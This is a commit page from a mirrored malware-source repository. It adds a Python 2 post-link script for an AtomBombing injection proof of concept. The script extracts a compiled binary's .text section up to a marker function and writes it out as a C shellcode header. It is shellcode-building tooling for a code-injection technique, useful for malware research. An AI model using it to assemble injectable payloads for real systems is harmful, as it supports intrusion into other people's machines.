daniel/MalwareSourceCode
1
0
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode.git synced 2026-06-15 15:29:23 +00:00
Code Issues Projects Releases Wiki Activity

updates and moves

Browse Source 
n/a
This commit is contained in:
vxunderground
2022-04-11 20:00:13 -05:00
parent 1275ea2e03
commit 900263ea6f
809 changed files with 149115 additions and 1594 deletions
Download Patch File Download Diff File Expand all files Collapse all files
Win32/Proof of Concepts/AtomBombingInjection/AtomBombingShellcode/Scripts/Post_Link.py
+31
View File
@@ -0,0 +1,31 @@
import pefile
import sys
import os
DUMMY_FUNC = "\x55\x8b\xec\x51\xc7\x45\xfc\xbe\xba\xad\xde\x8b\xe5\x5d\xc3"
def main():
exe_path = sys.argv[1]
pe = pefile.PE(exe_path)
print "Starting!"
output = ""
text_section = ""
for section in pe.sections:
if ".text" in section.Name:
print (section.Name, hex(section.VirtualAddress), hex(section.Misc_VirtualSize), section.SizeOfRawData )
text_section = pe.get_data(section.VirtualAddress, section.SizeOfRawData)
binary_shellcode = text_section[:text_section.find(DUMMY_FUNC)]
for byte in binary_shellcode:
output += "\\x%x" % ord(byte)
output = "#define SHELLCODE (\"%s\")" % output
folder, file_name = os.path.split(exe_path)
base, _ = os.path.splitext(file_name)
print os.path.join(folder, base+".h")
open(os.path.join(folder, base) + ".h", "wb").write(output)
open(os.path.join(folder, base) + ".text", "wb").write(text_section)
open(os.path.join(folder, base) + ".shellcode", "wb").write(binary_shellcode)
if __name__ == "__main__":
main()